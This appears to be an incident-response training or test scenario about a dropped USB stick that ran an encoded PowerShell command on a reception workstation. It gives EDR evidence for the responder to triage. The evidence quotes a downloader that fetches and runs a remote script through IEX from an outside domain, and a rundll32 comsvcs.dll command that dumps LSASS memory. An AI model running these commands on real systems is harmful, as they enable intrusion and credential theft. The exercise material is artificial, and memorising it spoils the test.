Retry in progress
You have 1 previous attempt for this scenario. Submitting again will create a new attempt and show a comparison against your most recent response.
Suspicious USB DeviceDifficulty · easyMedium asset
Automated alert from EDR (rule USB-LNK-EXEC-02).
Workstation RECEPT-WS-01 (reception desk, ground floor) executed a Windows shortcut (.lnk) from a removable USB drive at 16:03:17 UTC. The shortcut launched powershell.exe with an encoded command. Process tree:
explorer.exe → powershell.exe -nop -w hidden -enc <base64>
The reception staff member tells us she found a USB stick in the lobby labeled "Q2 Bonus — do not open" earlier today and plugged it in to "see who it belonged to." She has not used the workstation for any other task since.
Please respond.
— EDR / Endpoint Security
Evidence
EDR detection + USB enumeration (RECEPT-WS-01)
# Removable media event
Device: USB Mass Storage VID_0951&PID_1666 (Kingston)
Volume label: Q2_BONUS
First seen: 2026-04-19 16:01:42 UTC on RECEPT-WS-01
Files: Q2_Bonus_List.lnk, .hidden\stage1.ps1, README.txt
# LNK target (resolved)
target: %windir%\System32\WindowsPowerShell\v1.0\powershell.exe
args: -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB... (base64, decodes to IEX downloader)
# Decoded stage1 (preview)
$u = "https://cdn-doc-share[.]xyz/q2/s.ps1"
IEX (New-Object Net.WebClient).DownloadString($u)
# also attempts: rundll32 comsvcs.dll MiniDump <lsass pid> %TEMP%\l.dmp full
# Network activity from RECEPT-WS-01 (last 30 min)
16:03:18 TLS RECEPT-WS-01 → cdn-doc-share[.]xyz:443
16:03:19 EDR blocked outbound to cdn-doc-share[.]xyz (low-rep, 8d-old domain)
# AV / VirusTotal lookup on stage1.ps1
SHA256 a14f..be07 → 41/72 (PowerShell.Downloader.*)
Affected asset
- Name
- RECEPT-WS-01
- Type
- Reception desk Windows workstation (shared, no privileged data stored locally)
- Owner
- Office Operations
- Level
- Medium